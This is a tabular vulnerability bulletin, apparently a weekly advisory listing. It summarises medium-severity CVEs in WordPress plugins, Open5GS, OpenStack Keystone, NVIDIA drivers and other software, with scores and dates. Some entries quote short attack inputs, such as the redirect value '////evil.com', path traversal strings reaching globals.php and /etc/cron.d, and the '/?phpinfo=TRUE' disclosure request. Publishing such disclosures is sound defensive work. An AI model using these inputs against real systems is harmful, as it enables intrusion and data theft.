| murtaza-nasir--speakr | Speakr is a personal, self-hosted web application designed for transcribing audio recordings. Prior to 0.8.20-alpha, the is_safe_url() helper used to validate post-login redirect targets applied urljoin(request.host_url, target) before parsing, while the controller passed the raw target to redirect(). A scheme-relative input such as ////evil.com resolved to a same-host URL during validation but was emitted verbatim in the Location header, where the browser interpreted it as a network-path-relative redirect to an attacker-controlled host. This vulnerability is fixed in 0.8.20-alpha. | 2026-05-28 | 6.1 | CVE-2026-45307 |
| MusicPlayerDaemon--MPD | Music Player Daemon (MPD) before version 0.24.11 contains a server-side request forgery vulnerability in CurlInputPlugin where CURLOPT_FOLLOWLOCATION is set without CURLOPT_REDIR_PROTOCOLS_STR, allowing unauthenticated attackers to bypass the http/https scheme restriction by causing a malicious HTTP server to redirect to non-HTTP protocols such as gopher, ftp, sftp, ldap, dict, rtmp, or rtsp. Attackers can trigger this vulnerability via MPD commands that initiate URL fetches, including add, readcomments, albumart, readpicture, or load, to interact with internal or restricted network services on systems running libcurl versions prior to 7.85.0. | 2026-05-28 | 5.8 | CVE-2026-49129 |
| MusicPlayerDaemon--MPD | Music Player Daemon (MPD) before version 0.24.11 contains a CRLF injection vulnerability in the xspf_char_data function within the XSPF playlist plugin that allows attackers to embed literal CR/LF bytes in URI fields by supplying a malicious XSPF playlist with XML numeric character references. Attackers can inject forged key-value lines through the location field into MPD protocol responses including playlistinfo, currentsong, and listplaylist outputs, as well as the state file writer, by exploiting Expat's decoding of numeric character references prior to the character data callback. | 2026-05-28 | 5.3 | CVE-2026-49130 |
| mutualfunddata--Mutual Funds Data | The Mutual Funds Data plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' shortcode attribute in versions up to, and including, 1.2.1. This is due to insufficient input sanitization and output escaping on the user supplied 'title' attribute in the mfd_shortcode() function, which is concatenated directly into the HTML output within a <caption> element. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8869 |
| nakamura1458--auto making JSON-LD | The auto making JSON-LD plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.5.3. This is due to missing or incorrect nonce validation on the amJL_certification function. This makes it possible for unauthenticated attackers to update the plugin's license key option, and subsequently trigger license validation and pro feature installation on the victim site without the administrator's consent via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Successful exploitation can trigger downstream calls to amJL_is_license_valid() and amJL_download_and_install_pro_features(), meaning the impact extends beyond a simple settings change to unauthorized installation of plugin components. | 2026-05-27 | 4.3 | CVE-2026-8938 |
| nanomq--nanomq | NanoMQ MQTT Broker (NanoMQ) is an all-around Edge Messaging Platform. Prior to 0.24.14, aio->prov_data is stored as nni_quic_conn* during dialing, but read as ex_quic_conn* during dialer close. This type confusion causes invalid object interpretation and leads to close-path hang/crash behavior. This vulnerability is fixed in 0.24.14. | 2026-05-29 | 4.5 | CVE-2026-44640 |
| NASA--openVSP | NASA openVSP 3.16.1 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string in the geometry name field. Attackers can trigger a denial of service by pasting a 5000-byte payload into the name input field within the Geom browser pod addition interface. | 2026-05-25 | 6.2 | CVE-2018-25367 |
| nautobot--nautobot | Nautobot is a Network Source of Truth and Network Automation Platform. Prior to 2.4.33 and 3.1.2, Nautobot UI object-bulk-rename endpoints (for example, /dcim/interfaces/rename/) were vulnerable to application-wide denial of service via maliciously crafted regular expressions in the find field in combination with the use_regex flag. This vulnerability is fixed in 2.4.33 and 3.1.2. | 2026-05-28 | 6.5 | CVE-2026-44796 |
| nautobot--nautobot | Nautobot is a Network Source of Truth and Network Automation Platform. Prior to 2.4.33 and 3.1.2, in the case of inter-object references via GenericForeignKey (a pattern allowing an object to reference another object that may belong to one of several different "content types" or database tables), when creating or updating an object containing a GenericForeignKey, Nautobot's REST API failed to enforce user "view" permissions when determining whether a given reference to another object would be valid. This vulnerability is fixed in 2.4.33 and 3.1.2. | 2026-05-28 | 5.4 | CVE-2026-44794 |
| Navigatecms--Navigate CMS | Navigate CMS 2.8.5 contains a path traversal vulnerability that allows authenticated users to download arbitrary files by injecting directory traversal sequences in the id parameter. Attackers can send GET requests to navigate_download.php with path traversal payloads ../../../cfg/globals.php to access sensitive configuration files and system files outside the intended directory. | 2026-05-29 | 6.5 | CVE-2018-25393 |
| neilmccutcheon--Instant-Quote.co Quotation Page | The Instant-Quote.co Quotation Page plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Shortcode Attributes in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. A Contributor-level user can trigger execution against higher-privileged users by embedding the malicious shortcode in a post submitted for review, causing the injected scripts to execute when an administrator previews or views the post. | 2026-05-27 | 6.4 | CVE-2026-8884 |
| NeoRazorX--facturascripts | FacturaScripts is an open source accounting and invoicing software. In 2025.81 and earlier, an authenticated unrestricted file upload vulnerability exists in FacturaScripts' product image upload functionality. An attacker with valid credentials can upload a PHP file disguised as a GIF image (using a GIF89a header), bypassing MIME type validation. The file is stored with its original extension, including executable extensions such as .php. The vulnerability exists in the addImageAction() method of Core/Lib/ExtendedController/ProductImagesTrait.php. | 2026-05-27 | 6.3 | CVE-2026-42879 |
| NeoRazorX--facturascripts | FacturaScripts is an open source accounting and invoicing software. In 2025.92 and earlier, a stored Cross-Site Scripting (XSS) vulnerability exists in the product search modal of sales (Core/Lib/AjaxForms/SalesModalHTML.php) and purchases documents (Core/Lib/AjaxForms/PurchasesModalHTML.php). An authenticated user with access to the warehouse module can create a product with a malicious reference that executes arbitrary JavaScript in the browser of any other user who opens the product search modal inside an invoice, order, or delivery note. | 2026-05-27 | 5.4 | CVE-2026-42877 |
| NeoRazorX--facturascripts | FacturaScripts is an open source accounting and invoicing software. Prior to v2026, an unauthenticated information disclosure vulnerability in the Installer controller allows any remote attacker to trigger phpinfo() on a fresh FacturaScripts deployment by requesting /?phpinfo=TRUE, exposing full PHP configuration, server environment variables (including any database credentials, API keys, or application secrets set as env vars), filesystem paths, and loaded extensions without being authenticated. This vulnerability is fixed in v2026. | 2026-05-27 | 5.3 | CVE-2026-42878 |
| Nexcess--WPComplete | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nexcess WPComplete wpcomplete allows Stored XSS. This issue affects WPComplete: from n/a through <= 2.9.5.4. | 2026-05-27 | 6.5 | CVE-2026-42750 |
| nhadjidimitrov--LiveSmart Video Chat Live Video Chat | The LiveSmart Video Chat Live Video Chat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'livesmart_widget' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-28 | 6.4 | CVE-2026-9644 |
| Nikki Blight--QR Redirector | Missing Authorization vulnerability in Nikki Blight QR Redirector allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects QR Redirector: from n/a through 2.0.3. | 2026-05-25 | 4.3 | CVE-2026-24545 |
| nsthemes--NS Product icon badge | The NS Product icon badge plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PHP_SELF in all versions up to, and including, 1.2.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-05-27 | 6.1 | CVE-2026-8707 |
| nuts-foundation--nuts-node | nuts-node is the reference implementation of the Nuts specification. Prior to 6.2.3 and 5.4.31, the v1 access token introspection endpoint (/auth/v1/introspect_access_token) accepts any JWT signed by a key present on the node, without validating the JWT type, issuer-to-key binding, or required claims. This allows a Verifiable Presentation (VP) JWT to be replayed as an access token and receive an active: true introspection response. This vulnerability is fixed in 6.2.3 and 5.4.31. | 2026-05-26 | 4.4 | CVE-2026-41164 |
| NVIDIA--GeForce | NVIDIA Display Driver for Windows and Linux contains a vulnerability where an attacker could leak held driver locks. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-26 | 6.5 | CVE-2026-24182 |
| NVIDIA--GeForce | NVIDIA Display Driver for Linux contains a vulnerability in the Multi-Instance GPU (MIG) partition management, where an insecure default initialization of memory subsystem routing resources could lead to data corruption or a hang during partition reconfiguration. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-26 | 6.5 | CVE-2026-24197 |
| NVIDIA--GeForce | NVIDIA GPU Display Driver for Linux contains a vulnerability where an advanced attacker could use a race condition to leak sensitive memory, which might cause limited exposure of sensitive information to an unauthorized actor. A successful exploit of this vulnerability might lead to denial of service, data tampering, and information disclosure. | 2026-05-26 | 5.6 | CVE-2026-24198 |
| NVIDIA--GeForce | NVIDIA Display Driver for Windows and Linux contains a vulnerability in the kernel driver, where a user could cause an incorrect permission assignment for a critical resource. A successful exploit of this vulnerability might lead to data tampering and denial of service. | 2026-05-26 | 4.4 | CVE-2025-33221 |
| NVIDIA--GeForce | NVIDIA Display Driver for Linux contains a vulnerability in a kernel module, where a user could cause a race condition by reordering compiler or processor memory instructions. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-26 | 4.7 | CVE-2026-24199 |
| NVIDIA--Virtual GPU Manager | NVIDIA vGPU software contains a vulnerability in the virtual GPU manager, where an attacker could cause an out-of-bound access. A successful exploit of this vulnerability might lead to data tampering, denial of service, or information disclosure. | 2026-05-26 | 5.8 | CVE-2026-24201 |
| octalmage--Github Shortcode | The Github Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'repo' shortcode attribute in the 'github' shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8042 |
| OFCMS--OFCMS | A security flaw has been discovered in OFCMS up to 1.1.3. The impacted element is the function Query of the file ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\ComnController.java of the component ComnController. Performing a manipulation of the argument system.user.query results in SQL injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-31 | 6.3 | CVE-2026-10193 |
| OFCMS--OFCMS | A vulnerability was identified in OFCMS 1.1.3. This issue affects the function Query of the file \ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\system\SystemDictController.java of the component JSON Query Interface. The manipulation leads to SQL injection. The attack can be initiated remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-31 | 6.3 | CVE-2026-10202 |
| OFCMS--OFCMS | A security flaw has been discovered in OFCMS 1.1.3. Impacted is the function Query of the file \ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\system\SystemParamController.java of the component JSON Query Interface. The manipulation results in SQL injection. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-31 | 6.3 | CVE-2026-10203 |
| OFCMS--OFCMS | A weakness has been identified in OFCMS 1.1.3. The affected element is the function Query of the file \ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\system\SysUserController.java of the component JSON Query Interface. This manipulation causes SQL injection. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-31 | 6.3 | CVE-2026-10204 |
| OFFIS--DCMTK | A weakness has been identified in OFFIS DCMTK 3.7.0. This affects the function DcmQueryRetrieveIndexDatabaseHandle::deleteOldestImages of the file dcmqrdb/libsrc/dcmqrdbi.cc of the component dcmqrscp. Executing a manipulation can lead to heap-based buffer overflow. The attack may be launched remotely. This patch is called 0f78a4ef6f645ea5530166e445e5436a5de58e75. A patch should be applied to remediate this issue. | 2026-05-31 | 6.3 | CVE-2026-10194 |
| open-quantum-safe--liboqs | liboqs is a C-language cryptographic library that provides implementations of post-quantum cryptography algorithms. Prior to 0.16.0, an out-of-bounds read has been identified in the XMSS and XMSS^MT stateful signature verification code. When the verification function is called with a signature buffer shorter than the expected signature size for the given parameter set, the implementation does not validate the caller-supplied length and proceeds to read past the end of the buffer. The out-of-bounds bytes are consumed only as input to an internal hash computation and are not returned to the caller, so no oracle exists to leak their contents to an attacker. The primary observable effect is a possible crash (denial of service) of the verifying process if the read crosses into an unmapped memory page. This vulnerability is fixed in 0.16.0. | 2026-05-29 | 5.3 | CVE-2026-44518 |
| open-quantum-safe--liboqs | liboqs is a C-language cryptographic library that provides implementations of post-quantum cryptography algorithms. Prior to 0.16.0, an out-of-bounds read has been identified in the XMSS and XMSS^MT stateful signature verification code. When the verification function is called with a correctly-sized signature buffer for the declared algorithm but a public key whose OID bytes (pk[0..3]) reference a different XMSS parameter set with a larger sig_bytes, the implementation re-parses the OID from the public key inside xmss_sign_open / xmssmt_sign_open and uses the resulting (larger) sig_bytes to index the caller-supplied signature buffer. As with CVE-2026-44518, the out-of-bounds bytes are consumed only as input to an internal hash computation and are not returned to the caller, so no oracle exists to leak their contents to an attacker. The primary observable effect is a possible crash (denial of service) of the verifying process if the read crosses into an unmapped memory page. This vulnerability is fixed in 0.16.0. | 2026-05-29 | 5.3 | CVE-2026-46344 |
| open-telemetry--opentelemetry-dotnet-contrib | The OpenTelemetry.Exporter.Instana exports telemetry to Instana backend. Prior to 1.1.0, the OpenTelemetry.Exporter.Instana NuGet package does not validate HTTPS/TLS certificates are valid when sending telemetry to a configured Instana back-end when a proxy is configured using the INSTANA_ENDPOINT_PROXY environment variable. If a network attacker can Man-in-the-Middle (MitM) the proxy connection, all OpenTelemetry telemetry data and the Instana API key are exposed to the attacker. This vulnerability is fixed in 1.1.0. | 2026-05-26 | 6.5 | CVE-2026-44213 |
| open-telemetry--opentelemetry-java | opentelemetry-java is the Java implementation of the OpenTelemetry API for recording telemetry, and SDK for managing telemetry recorded by the API. Prior to 1.62.0, a vulnerability affects the baggage propagation implementation in opentelemetry-api and opentelemetry-extension-trace-propagators. Parsing oversized baggage causes unbounded memory allocation and CPU consumption. Because baggage is automatically re-injected into every outgoing request, the effect can fan out to downstream services that never received the original malicious request. This vulnerability is fixed in 1.62.0. | 2026-05-28 | 5.3 | CVE-2026-45292 |
| Open5GS--Open5GS | A vulnerability was found in Open5GS up to 2.7.7. Affected by this vulnerability is an unknown functionality in the library lib/sbi/nnrf-handler.c of the component Shared NF-profile Parser. The manipulation results in denial of service. It is possible to launch the attack remotely. The exploit has been made public and could be used. A patch should be applied to remediate this issue. | 2026-05-30 | 4.3 | CVE-2026-10113 |
| Open5GS--Open5GS | A vulnerability was determined in Open5GS up to 2.7.7. Affected by this issue is the function handle_scp_info in the library lib/sbi/nnrf-handler.c of the component Shared NF-profile Parser. This manipulation causes out-of-bounds write. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. To fix this issue, it is recommended to deploy a patch. | 2026-05-30 | 4.3 | CVE-2026-10114 |
| Open5GS--Open5GS | A vulnerability was identified in Open5GS up to 2.7.7. This affects an unknown part in the library lib/sbi/nnrf-handler.c of the component Shared NF-profile Parser. Such manipulation leads to denial of service. The attack can be launched remotely. The exploit is publicly available and might be used. It is advisable to implement a patch to correct this issue. | 2026-05-30 | 4.3 | CVE-2026-10115 |
| Open5GS--Open5GS | A security flaw has been discovered in Open5GS up to 2.7.7. This vulnerability affects the function ogs_sbi_xact_add in the library /lib/core/ogs-timer.c of the component ue-authentications Endpoint. Performing a manipulation results in denial of service. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. Applying a patch is the recommended action to fix this issue. | 2026-05-30 | 4.3 | CVE-2026-10116 |
| Open5GS--Open5GS | A weakness has been identified in Open5GS up to 2.7.7. This issue affects the function ogs_pool_id_calloc in the library /lib/sbi/nghttp2-server.c. Executing a manipulation can lead to denial of service. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. It is best practice to apply a patch to resolve this issue. | 2026-05-30 | 4.3 | CVE-2026-10117 |
| Open5GS--Open5GS | A vulnerability was determined in Open5GS up to 2.7.7. This affects the function handle_amf_info in the library /lib/sbi/nnrf-handler.c of the component nf-instances Endpoint. Executing a manipulation of the argument nf_info_pool can lead to resource consumption. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. Applying a patch is advised to resolve this issue. The issue report is flagged as already-fixed. | 2026-05-30 | 4.3 | CVE-2026-10156 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.29 contains an SSRF policy bypass vulnerability in browser debug and export routes that allows reuse of already-open blocked tabs. Attackers with access to these routes can bypass private-network SSRF policies by reusing blocked tabs to export or inspect content that should remain protected. | 2026-05-29 | 6.5 | CVE-2026-35673 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.29 contains a policy bypass vulnerability in QQBot admin commands that allows authenticated senders to skip DM-only and allowFrom policy checks. Attackers can route admin commands from unauthorized senders or contexts to execute restricted behavior that policy should have blocked. | 2026-05-29 | 5.4 | CVE-2026-34507 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.12 contains a privilege escalation vulnerability in Slack plugin approvals that allows exec-authorized users to resolve plugin approvals through the exec approver gate. Attackers with limited exec approval permissions can bypass intended approval splits to approve plugin actions outside operator configuration. | 2026-05-29 | 4.3 | CVE-2026-32906 |
| Openkm--OpenKM Community Edition | OpenKM 6.3.12 contains a local file inclusion vulnerability in the administrative scripting interface at /admin/Scripting that allows authenticated administrators to read arbitrary files by supplying an attacker-controlled filesystem path through the fsPath parameter with action=Load. Attackers can exploit this to access sensitive files including /etc/passwd, configuration files containing database credentials, and JVM keystores accessible to the OpenKM process. | 2026-05-26 | 4.9 | CVE-2026-41917 |
| OpenStack--Keystone | An issue was discovered in OpenStack Keystone before 29.0.2. The Keystone application credential authentication plugin does not verify that the user supplied in the authentication request matches the owner of the application credential. An attacker can authenticate with their own application credential ID and secret while specifying a different user's name and domain in the request body. Keystone issues a token attributed to the victim user. The impersonated token is project-scoped and carries the intersection of the application credential's roles and the victim's actual roles on the project. This enables audit evasion, reading the victim's credentials, and acting as the victim within shared projects. | 2026-05-28 | 6 | CVE-2026-42998 |
| OpenStack--Keystone | An issue was discovered in OpenStack Keystone before 29.0.2. The Keystone RBAC policy enforcer in enforce_call unconditionally merges the raw JSON request body into the policy enforcement dictionary via policy_dict.update(json_input.copy()), overwriting trusted target data that was previously set from database lookups. Because flask.request.get_json is called with force=True, this works regardless of Content-Type or HTTP method. Any authenticated user can inject arbitrary policy target attributes (e.g., user_id, project_id) into the request body to bypass RBAC checks and perform unauthorized operations on resources belonging to other users or projects. This was introduced in commit 5ea59f52 (Rocky/14.0.0). | 2026-05-28 | 6 | CVE-2026-42999 |
| OpenStack--Keystone | An issue was discovered in OpenStack Keystone before 29.0.2. When combined with an application credential impersonation vulnerability, an attacker with the member role on a project can escalate to admin by chaining unrestricted application credentials with Keystone trusts. The impersonated token carries the victim's identity, which passes the trustor validation check. Keystone then validates the delegated roles against the victim's actual role assignments in the database, not the roles on the requesting token. This allows the attacker to create a trust delegating the victim's admin role to themselves. The trust persists independently, and additional trusts and application credentials can be created to maintain access. All actions are logged under the victim's identity. | 2026-05-28 | 6 | CVE-2026-43000 |
| OpenStack--Keystone | An issue was discovered in OpenStack Keystone before 29.0.2. The Keystone federated token rescoping mechanism does not propagate the original token's expiry to the newly issued token. When a federated user rescopes a token via POST /v3/auth/tokens, the handle_scoped_token() function in the mapped authentication plugin returns response data without an expires_at value. The token provider falls back to issuing a token with a fresh default TTL. By rescoping repeatedly before each token expires, a user can maintain access indefinitely, bypassing operator-configured token lifetime policies. This is a variant of CVE-2012-3426. Only deployments using federated identity (SAML2, OpenID Connect) are affected. | 2026-05-28 | 6 | CVE-2026-44394 |
| Openstamanager--Open STA Manager | Open STA Manager 2.3 contains a path traversal vulnerability that allows authenticated users to download arbitrary files by manipulating the file parameter. Attackers can send GET requests to modules/backup/actions.php with op=getfile and traverse directories using ../ sequences to access sensitive system files. | 2026-05-30 | 6.5 | CVE-2018-25421 |
| Oracle Corporation--Oracle REST Data Services | Vulnerability in Oracle REST Data Services (component: Mongoapi). Supported versions that are affected are 24.2.0-26.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle REST Data Services. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle REST Data Services accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). | 2026-05-28 | 5.3 | CVE-2026-46830 |
| Oracle Corporation--Oracle REST Data Services | Vulnerability in Oracle REST Data Services (component: General). Supported versions that are affected are 24.2.0-26.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle REST Data Services. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle REST Data Services accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). | 2026-05-28 | 5.3 | CVE-2026-46841 |
| Oracle Corporation--Oracle REST Data Services | Vulnerability in Oracle REST Data Services (component: Core). Supported versions that are affected are 24.2.0-26.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle REST Data Services. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle REST Data Services accessible data. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N). | 2026-05-28 | 5.3 | CVE-2026-46842 |
| Oracle Corporation--Oracle REST Data Services | Vulnerability in Oracle REST Data Services (component: Core). Supported versions that are affected are 24.2.0-26.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle REST Data Services. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle REST Data Services. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). | 2026-05-28 | 5.3 | CVE-2026-46843 |
| Orthanc--Explorer 2 | A weakness has been identified in Orthanc Explorer 2 up to 1.12.0. The impacted element is an unknown function of the file WebApplication/src/components/StudyList.vue of the component URL Handler. This manipulation of the argument remote-source causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. Patch name: 21f78ce5da668bf5233efcd1896ec7c6e3b22eae. Applying a patch is the recommended action to fix this issue. | 2026-05-31 | 4.3 | CVE-2026-10173 |
| OTRS AG--OTRS | An improper default configuration in OTRS 2026.3.1 causes ticket article forwarding actions to enforce the "Is visible for customer" flag by default and prevent users from disabling it via the UI. This leads to unintended exposure of internal ticket information to the External Frontend. This issue affects OTRS 2026.3.1. | 2026-05-31 | 5.7 | CVE-2026-48210 |
| OUSL-GROUP-BrinaryBrains--School Student Management System | A security vulnerability has been detected in OUSL-GROUP-BrinaryBrains School Student Management System up to 1e70e5ad1125b86dca4ee086eb6bb121f17708b6. Affected is the function marks of the file application/controllers/Parents.php. The manipulation of the argument param1 leads to improper control of resource identifiers. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. Continuous delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-31 | 6.3 | CVE-2026-10168 |
| oviva-ag--epa4all-client | epa4all-client is the Java Client for epa4all / ePA 3.0 in the Telematik Infrastruktur. In 1.2.4 and earlier, any network-reachable caller can write arbitrary documents to any patient's electronic health record accessible by the institution's SMC-B card. In a misconfigured deployment (e.g., following the production Docker example in the README), this is exploitable from the local network without credentials. | 2026-05-26 | 6.5 | CVE-2026-47672 |
| Patterns in the cloud--Autoship Cloud for WooCommerce Subscription Products | Missing Authorization vulnerability in Patterns in the cloud Autoship Cloud for WooCommerce Subscription Products allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Autoship Cloud for WooCommerce Subscription Products: from n/a through 2.14.0. | 2026-05-25 | 4.3 | CVE-2026-24527 |
| paulpela--My Email Shortcode | The My Email Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'subject' shortcode attribute in the 'my-email' shortcode in all versions up to, and including, 0.91 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8048 |
| peachpay--PeachPay Payments & Express Checkout for WooCommerce (supports Stripe, PayPal, Square, Authorize.net, NMI) | The PeachPay - Payments & Express Checkout for WooCommerce (supports Stripe, PayPal, Square, Authorize.net, NMI) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.120.46. This is due to missing or incorrect nonce validation on the peachpay_stripe_handle_admin_actions function. This makes it possible for unauthenticated attackers to permanently delete all stored Stripe credentials - including publishable keys, secret keys, webhook secrets, and Apple Pay configuration - from the WordPress database, disabling Stripe payment processing for the store via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-28 | 4.3 | CVE-2026-9618 |
| PickPlugins--Team Showcase | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PickPlugins Team Showcase allows Stored XSS. This issue affects Team Showcase: from n/a through 1.22.28. | 2026-05-25 | 6.5 | CVE-2025-62745 |
| portainer--portainer | Portainer Community Edition is a lightweight service delivery platform for containerized applications that can be used to manage Docker, Swarm, Kubernetes and ACI environments. From 2.33.0 to before 2.33.8, Portainer's backup restore feature accepts a .tar.gz archive and extracts it to a target directory on the server. The extraction function (ExtractTarGz in api/archive/targz.go) constructed output paths using filepath.Clean(filepath.Join(outputDirPath, header.Name)). This combination does not prevent directory traversal - a tar entry named ../../etc/cron.d/evil resolves to a path outside the extraction root, so a crafted archive can write files to arbitrary locations on the server filesystem. This vulnerability is fixed in 2.33.8. | 2026-05-28 | 5.5 | CVE-2026-44885 |
| posimyththemes--The Plus Addons for Elementor Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce | The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'carousel_direction' parameter of the Carousel Anything widget in versions up to, and including, 6.4.15. This is due to insufficient output escaping in the render() function, where the carousel_direction value is placed into an unquoted HTML attribute (dir=) allowing attribute injection despite the use of esc_attr(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-29 | 6.4 | CVE-2026-9243 |
| Prasad Kirpekar--WP Meta and Date Remover | Missing Authorization vulnerability in Prasad Kirpekar WP Meta and Date Remover allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Meta and Date Remover: from n/a through 2.3.6. | 2026-05-27 | 4.3 | CVE-2026-49051 |
| prolix-oc--Lumiverse | Lumiverse is a full-featured AI chat application. Prior to 0.9.7, consumeNonce() only checks that the module-level variable is set and unexpired. It does not validate any value from the incoming HTTP request or bind the nonce to the admin's session. If the admin's auth.api.signUpEmail() call fails before the before hook fires (e.g. BetterAuth rejects a duplicate email at the validation layer), the nonce is set but never consumed. Any POST /api/auth/sign-up/email request that arrives during the remaining window registers successfully regardless of who sent it. An attacker who can observe or predict when the admin is creating users (must be a duplicate user) can race the 10-second window to register an unauthorized account. This vulnerability is fixed in 0.9.7. | 2026-05-26 | 4.8 | CVE-2026-44443 |
| pyload--pyload | pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the fix for CVE-2026-33509 prevents setting storage_folder inside PKGDIR or userdir, but does NOT protect the Flask session directory (/tmp/pyLoad/flask). An authenticated attacker can set storage_folder to the session directory and download session files of other users via /files/get/, leading to account takeover. This vulnerability is fixed in 0.5.0b3.dev100. | 2026-05-28 | 6.5 | CVE-2026-45306 |
| pyload--pyload | pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the PREREQFUNCTION-based private IP check was not applied to HTTPRequest (used by the parse_urls API). An authenticated attacker can supply a URL pointing to an attacker-controlled server that responds with a 302 redirect to an internal/private IP address, bypassing the is_global_host() check on the initial URL. This vulnerability is fixed in 0.5.0b3.dev100. | 2026-05-28 | 5 | CVE-2026-46561 |
| QianFox--FoxCMS | A vulnerability was identified in QianFox FoxCMS up to 1.2.6. This affects the function Edit of the file Admin.php. The manipulation leads to weak password recovery. The attack can be initiated remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-27 | 4.7 | CVE-2026-9609 |
| rahulbhangale--WP Promoter | The WP Promoter plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-27 | 6.1 | CVE-2026-8906 |
| rahulbhangale--WP Promoter | The WP Promoter plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the reset_stats() function in versions up to, and including, 1.3. The function is hooked to both the wp_ajax_wpp-reset_stats and wp_ajax_nopriv_wpp-reset_stats actions and contains no authentication, authorization, or nonce validation. This makes it possible for unauthenticated attackers to reset the plugin's bar and popup statistics by deleting the wpp_bar and wpp_popup options. | 2026-05-27 | 5.3 | CVE-2026-9014 |
